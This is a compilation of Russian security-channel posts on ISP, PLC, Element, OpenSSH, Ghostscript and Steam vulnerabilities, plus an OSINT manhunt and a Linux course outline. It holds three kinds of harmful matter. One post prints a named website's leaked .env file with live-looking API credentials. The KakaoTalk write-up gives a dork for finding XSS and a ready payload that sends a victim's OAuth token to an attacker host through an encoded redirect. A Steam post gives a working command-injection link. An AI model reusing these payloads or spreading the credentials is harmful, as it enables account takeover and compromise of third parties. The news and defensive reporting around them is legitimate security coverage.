Взлом провайдера или как я получил доступ к миллионам устройств

Есть такая спецификация, TR-069 или CPE WAN. С помощью нее провайдер из специальной админки может отправить клиенту любой конфиг на его роутер.

Она не является священным граалем, а доступ к ней имеют тысячи "специалистов" техподдержки для помощи клиентам.

Попасть в админку = контролировать всех клиентов провайдера, а вместе с тем и перепрошить любой роутер.

Герой статьи, Сэм Карри, однажды обнаружил, что, когда он делает curl-запрос на AWS-сервер с собственного ПК, то спустя 10 секунд на этот же сервер приходил еще один точно такой же запрос, но уже с другого IP.

И это повторялось снова и снова.

Немного раскопав глубже, выяснилось, что кто-то встал между ним и провайдером и, вероятно, реализовал сценарий, о котором я писал в начале поста.

Вооружившись Burp'ом, Сэм смог повторить полный путь злоумышленника и повторно взломал провайдера, а вместе с тем получил доступ ко всем его клиентам, включая FBI.

Ищем самого разыскиваемого главаря банды, награда — $2 000 000

На фото — главарь банды Kraze Baryé, которого разыскивает ФБР. Он обвиняется в убийстве нескольких полицейских и многочисленных похищениях гаитянских миссионеров.

В это сложно поверить, но сегодня он входит в топ-10 самых разыскиваемых преступников в мире. За информацию, ведущую к его поимке, правоохранители обещают вознаграждение в размере до 2 миллионов долларов.

В этой статье, с помощью Google Earth и ориентировании на местности, мы найдем место, где он скрывается вместе со своими сообщниками.

Hunt3r Kill3rs and the Italian Critical Infrastructure risks

Иранские школьники, которых называют себя Cyber Av3ngers APT, мимикрируют под россиян, и ломают израильские ПЛК Unitronics.

В своих сообщениях на ломаном русском они рассказывают о том, как отключают водоочистные сооружения и другую критическую инфраструктуру, заявляя, что "атакуют Европу и НАТО за их преступления".

Помимо того, что у Unitronics отключена аутентификация по-умолчанию, так еще и недавно исследователи из Team 82 нашли 8 уязвимостей, цепочка из которых позволяет выполнить код удаленно в обход аутентификации (на случай, если ее все-таки кто-нибудь не забудет включить).

Зачем к ним открывать доступ из интернета — загадка. Но, как показывает Shodan, таких устройств действительно много (пора закрывать и обновляться). Исследование — тут,

https://freetrumpknife.com/.env

APP_NAME=Trump
APP_ENV=local
APP_DEBUG=false
APP_URL=https://freetrumpknife.com

API_USER=gunnergear.api
API_PASS=v95E*JfVEq1^aiY!

За наводку спасибо @ld_anarchy

HTML entities that create ASCII characters inside a JavaScript URL

This vector loops through all entities and assigns them to a JavaScript URL and checks if they decode to ASCII characters.

1-click Exploit in South Korea's biggest mobile chat app

Account Takeover в самом популярном у корейцев мессенджере KakaoTalk.

Когда открывается диплинк, в него отправляется OAuth-токен пользователя, но только если домен доверенный, — проблема, и вот как она решается.

1. Находим XSS на домене из белого списка с помощью дорки:

site:*.kakao.com inurl:search -site:developers.kakao.com -site:devtalk.kakao.com

2. Отправляем не подозревающему собеседнику ссылку на свой сайт evil.com, где должен быть размещен следующий JS-код с XSS:

location.href = kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:"><img src=x onerror="document.location=atob('aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv');">

Он откроет вебвью, приложение отправит OAuth-токен на домен из белого списка и выполнит XSS с редиректом и токеном на сайт хакера.

Баг был отправлен в 2023 году, а выплата составила $0, потому что владельцы приложения выплачивают награды только соотечественникам ¯\_(ツ)_/¯

Families that commit state-sponsored-cyber-espionage stay together ❤️

Father: Tim Vakhaevich Stigal, wanted by the United States Secret Service

Son: Amin Timovich Stigal, wanted by the United States Federal Bureau of Investigation

Element Android CVE-2024-26131, CVE-2024-26132 - Never Take Intents From Strangers

Экспорт неэкспортируемого из клиента Element.

Интент — способ, с помощью которых приложения общаются друг с другом. Например, когда одно приложение хочет открыть камеру, оно отправляет соответствующее "намерение".

Существуют неэкспортируемые интенты, которые используются только внутри приложения, и не могут быть вызваны из вне. Как правило, они более критичны и могут выполнять разные действия, включая смену пароля, работу с платежами и многое другое.

В Element была найдена уязвимость Intent Redirection, с помощью которой можно было сменить PIN-код на входе в приложение и получить доступ к внутренним файлам.

1. В MainActivity приложения был код, который обрабатывал Extra параметр в полученном Intent:

if (intent.hasExtra(EXTRA_NEXT_INTENT)) {
  val nextIntent = intent.getParcelableExtraCompat<Intent>(EXTRA_NEXT_INTENT)
  startIntentAndFinish(nextIntent)
}

2. Этот код извлекал вложенный Intent из Extra параметра и запускал его без дополнительных проверок.

3. Проблема заключалась в том, что MainActivity была экспортирована (доступна для вызова из других приложений), а запуск вложенного Intent происходил уже от имени самого Element.

Третье приложение => экспортируемый интент => неэкспортируемый интент

Благодаря этому можно было вызвать любой интент, который существовал в приложении, включая неэкспортируемые: на смену пин-кода, открытие вебвью, и получение файлов, которые были отправлены внутри.

Breaking Custom Encryption Using Frida (Mobile Application Pentesting)

Обычно запросы, передаваемые от клиента к серверу, зашифрованы SSL/TLS и, перехватывая трафик с помощью Burp или любого другого прокси с импортом сертификата на клиенте, мы видим содержимое в плеинтексте.

Однако некоторые приложения сами дополнительно шифруют тело запроса своими алгоритмами, в котором приходится разбираться. В этой статье приведен пример как раз такого случая с объяснением того, как научиться расшифровать трафик на ходу, используя реверс-инжиниринг и Frida.

— Understanding Encrypted Requests in Mobile Apps
— Creating a Frida script
— Step-by-Step Guide to Decrypting Data Using Frida
— Conclusion: The Impact of Dynamic Instrumentation
— Recommendations for Developers

CVE-2024-6387 - regreSSHion: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server

Debian Security
Зарепортили, Qualyz Threat Research Unit, новость от них

Уязвимость в openssh server, занесённая коммитом, который рефакторил систему логирования. Под угрозой версии, начиная с 8.5.p1 исключительно до 9.8p1 (вышла 7 часов назад) .

Проверить, какая у вас сейчас версия: sshd -V


На всякий случай сделал инструкцию по установке 9.8p1 на Debian-based (Debian, Ubuntu, Mint, ...):

apt-get update
apt-get install build-essential zlib1g-dev libssl-dev libpam0g-dev libselinux1-dev
wget https://github.com/openssh/openssh-portable/archive/refs/tags/V_9_8_P1.tar.gz
tar -xzf V_9_8_P1.tar.gz
cd openssh-portable-V_9_8_P1
./configure
make
make install
mv /usr/sbin/sshd /usr/sbin/sshd.bak
ln -s /usr/local/sbin/sshd /usr/sbin/sshd
systemctl restart sshd

На примере сервера pypi-quarantine из этой статьи:
До: OpenSSH_8.9p1 Ubuntu-3ubuntu0.6, OpenSSL 3.0.2 15 Mar 2022
После: OpenSSH_9.8p1, OpenSSL 3.0.2 15 Mar 2022
Баннер по nc: SSH-2.0-OpenSSH_9.8

Подведем итоги нашего бесплатного курса "Linux для новичков". Курс был составлен из различных модулей, предназначенных для ознакомления с основными аспектами работы в операционной системе Linux.

В рамках курса были изучены основы работы с файлами и директориями, управление пользователями и группами, сетевые возможности Linux, мониторинг, журналирование и проверка безопасности. Также были рассмотрены темы работы с данными и дисками в Linux, туннелирование трафика и полезные инструменты для взлома.

Неделя 1: Введение в Linux
• Что такое Linux и почему его выбирают?
• Основные дистрибутивы Linux: Ubuntu, Fedora, CentOS и др.
• Установка Linux: дуализм с Windows, LiveCD и виртуальные машины.
• Основные команды командной строки Linux: cd, ls, mkdir, rm и др.
• Структура файловой системы Linux: /bin, /etc, /home и др.
• Пакетный менеджер APT для установки и обновления программ.
• Основы текстового редактора nano: открытие, редактирование и сохранение файлов.

Неделя 2: Работа с файлами и директориями
• Основные команды для работы с файлами и директориями: cp, mv, rm и др.
• Работа с архивами в Linux: создание, разархивирование, просмотр.
• Поиск файлов и содержимого в Linux: команды find и grep.
• Управление правами доступа к файлам и директориям в Linux: chmod и chown.
• Символьные и жесткие ссылки: создание и использование.
• Управление процессами и задачами в Linux: команды ps, top, kill и др.
• Автоматическое выполнение задач с помощью cron.

Неделя 3: Управление пользователями и группами
• Создание и удаление пользователей в Linux: команды useradd и userdel.
• Управление паролями пользователей: команда passwd.
• Назначение пользователей в группы: команда usermod.
• Создание и удаление групп в Linux: команды groupadd и groupdel.
• Управление правами доступа к файлам и директориям для пользователей и групп.
• Просмотр информации о пользователях и группах: команды id, whoami и др.
• Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.

Неделя 4: Сетевые возможности Linux
• Конфигурация сети в Linux: настройка IP-адреса, маски подсети, шлюза.
• Проверка сетевого подключения: команда ping.
• Конфигурация сетевых интерфейсов: команды ifconfig и ip.
• Работа с удаленными хостами через SSH: подключение, передача файлов.
• Конфигурация DNS-сервера в Linux: файл /etc/resolv.conf.
• Настройка файрвола в Linux: команда iptables.
• Основы настройки и использования сетевых служб в Linux: FTP, Samba и др.
• Основы настройки и использования сетевых служб в Linux: Apache.

Неделя 5: Мониторинг, журналирование, проверка безопасности.
• Лог файлы системы Linux
• Как настроить центральный сервер ведения логов с помощью Rsyslog в Linux.
• Анализ лог-файлов: команды grep, awk, sed.
• Настройка системы мониторинга и аудита: утилиты auditd, nmon.
• Система мониторинга Zabbix
• Мониторинг сети с помощью tcpdump
• Проверка безопасности системы с помощью LinPEAS

Неделя 6: Работа с данными и дисками в Linux
• Использование утилиты rsync для синхронизации данных.
• Основы языка сценариев Bash: переменные, условия, циклы.
• Создание и выполнение сценариев Bash: утилита bash.
• Работа с образами дисков: команды dd, ddrescue.
• Восстановление данных с помощью LiveCD.
• Создание и настройка RAID-массивов для защиты данных.
• Дефрагментация диска Linux

Неделя7: Туннелирование трафика
• Установка и настройка OpenVPN сервера на Ubuntu
• Простая настройка WireGuard Linux.
• Настройка Shadowsocks.
• Pivoting: Chisel
• SSH туннели
• Проксирование трафика с помощью proxychains
• Pivoting: Lugolo-ng

Неделя 8: Полезные инструменты для взлома
• nmap 1 часть
• nmap 2 часть
• nmap 3 часть
• crackmapexec
• metasploit
• Burp Suite
• sqlmap

Не забывайте сохранить и поделиться нашим бесплатным курсом "Linux для новичков"!

#Linux #обучениеlinux #статьипоLinux

LH | Новости | Курсы | Мемы

CVE-2024-29510 – Exploiting Ghostscript using format strings

RCE с побегом из песочницы в Ghostscript ≤ 10.03.0. Задето много онлайн сервисов, позволяющих работать с документами.

Работает и в LibreOffice, так как при открытии он будет вызывать libreoffice-convert с Ghostscript в headless моде.

PoC

Exploiting Steam: Usual and Unusual Ways in the CEF Framework

Introduction
1. RCE#1: Multiple Issues in steamwebhelper Leading to RCE
— Obtaining the SteamClient Object in External Pages
— Loading the File Protocol Using BrowserView
— Accessing the Content of Pages Loaded in BrowserView to Read Arbitrary Files
— From arbitrary file reading to arbitrary file creation
— From Arbitrary File Creation to RCE
2. RCE#2: Command Injection in steam://rungame
3. RCE#3: Historical Vulnerabilities in Chrome

Шел 2024 год, а в стиме все еще находят Command Injection.

Есть схема steam://rungame, она запускает нужную игру. А внутри вызывает команду

/bin/sh -c /home/bob/.local/share/Steam/ubuntu12_32/reaper SteamLaunch AppId={appid} -- /home/bob/.local/share/Steam/ubuntu12_32/steam-launch-wrapper -- {gamepath} {argument}

где вместо appid подставляй что хочешь, пример эксплойта

<a href="steam://rungame/262410/76561202255233023/%5c'`gnome-calculator`%5c'">POPUP gnome-calculator</a>

https://github.com/gracenolan/Notes

Я инженер по безопасности в Google, и это заметки, сделанные во время подготовки к собеседованиям. Это моя первая работа в сфере безопасности, и многие спрашивали меня, как я учился.

Мои заметки состоят в основном из списка терминов и технологий, которые нужно изучить, а также небольших кусочков информации, которые помогли мне запомнить некоторые детали.

Я включил советы по собеседованию и стратегии обучения, которые так же важны, как и знание тем, которые следует изучать.

— Learning Tips
— Interviewing Tips
— Networking
— Web Application
— Infrastructure (Prod / Cloud) Virtualisation
— OS Implementation and Systems
— Mitigations
— Cryptography, Authentication, Identity
— Malware & Reversing
— Exploits
— Attack Structure
— Threat Modeling
— Detection
— Digital Forensics
— Incident Management
— Coding & Algorithms
— Security Themed Coding Challenges